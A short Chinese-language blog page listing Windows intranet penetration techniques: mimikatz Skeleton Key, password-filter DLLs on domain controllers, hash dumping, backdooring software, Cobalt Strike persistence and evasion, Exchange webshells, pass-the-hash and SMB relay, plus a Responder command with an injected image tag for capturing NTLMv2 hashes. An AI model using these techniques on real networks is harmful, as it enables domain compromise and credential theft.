值得一看
正规流量卡

windows内网渗透杂谈

------正文内容展示,开始汲取新知识啦------

  1. mimikatz Skeleton Key SSP Skeleton Key被安装在64位的域控服务器上,支持Windows Server2003—Windows Server2012 R2,能够让所有域用户使用同一个万能密码进行登录现有的所有域用户使用原密码仍能继续登录,重启后失效,使用mimikatz就可以安装。
  2. 记录域控密码 https://gist.github.com/mubix/6514311#file-evilpassfilter-cpp
  3. dump 域内所有hash
  4. 常用软件插后门 https://github.com/secretsquirrel/the-backdoor-factory
  5. cobalt-strike-persistence https://github.com/Tom4t0/cobalt-strike-persistence
  6. EXCHANGE服务器留webshell
  7. 控制一些vpn账号
  8. dump dns解析记录 dump ldap信息

工作组渗透

  • 常规内网渗透
  1. 日服务
  2. pass the hash

各种欺骗攻击

https://github.com/SpiderLabs/Responder 撸下内网一个网站挂上<img src=\\xxx\\xx>然后执行下面命令,就可以抓取ntlmv2 hash

./Responder.py -I eth0 -rPv

SMBRelay Attack

impacket

cobaltstrike工具免杀

cobaltstrike+veil

1 2 3 4 5

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞2514赞赏 分享
抢沙发

请登录后发表评论

    暂无评论内容